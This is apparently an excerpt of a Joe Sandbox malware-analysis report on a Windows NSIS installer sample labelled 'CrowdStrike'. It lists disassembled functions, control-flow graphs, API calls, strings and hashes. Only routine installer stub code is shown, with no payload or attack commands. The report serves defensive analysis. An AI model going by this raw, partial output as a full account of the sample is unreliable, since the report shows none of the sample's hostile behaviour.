                                                                        control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                                        APIs
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 608394941-1650083594
                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                        Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                        • CompareFileTime.KERNEL32(-00000014,?,MostIsrael,MostIsrael,00000000,00000000,MostIsrael,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$MostIsrael
                                                                        • API String ID: 4286501637-3932108565
                                                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                        Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                        Strings
                                                                        • Inst, xrefs: 0040366C
                                                                        • Null, xrefs: 0040367E
                                                                        • soft, xrefs: 00403675
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                        • Error launching installer, xrefs: 004035D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 4283519449-527102705
                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                        Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                        • API String ID: 651206458-1535804072
                                                                        • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                        • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                        Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GlobalFree.KERNELBASE(00753688), ref: 00402387
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGloballstrcpyn
                                                                        • String ID: Exch: stack < %d elements$MostIsrael$Pop: stack empty
                                                                        • API String ID: 1459762280-4003919556
                                                                        • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                        • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • GlobalFree.KERNELBASE(00753688), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 3376005127-0
                                                                        • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                        • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                        • String ID:
                                                                        • API String ID: 2568930968-0
                                                                        • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                        • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                                                                        APIs
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1711481938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711525176.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711556223.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1711653784.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_CrowdStrike.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                        • API String ID: 3156913733-2180253247
                                                                        • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                        • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                        Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1711503623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
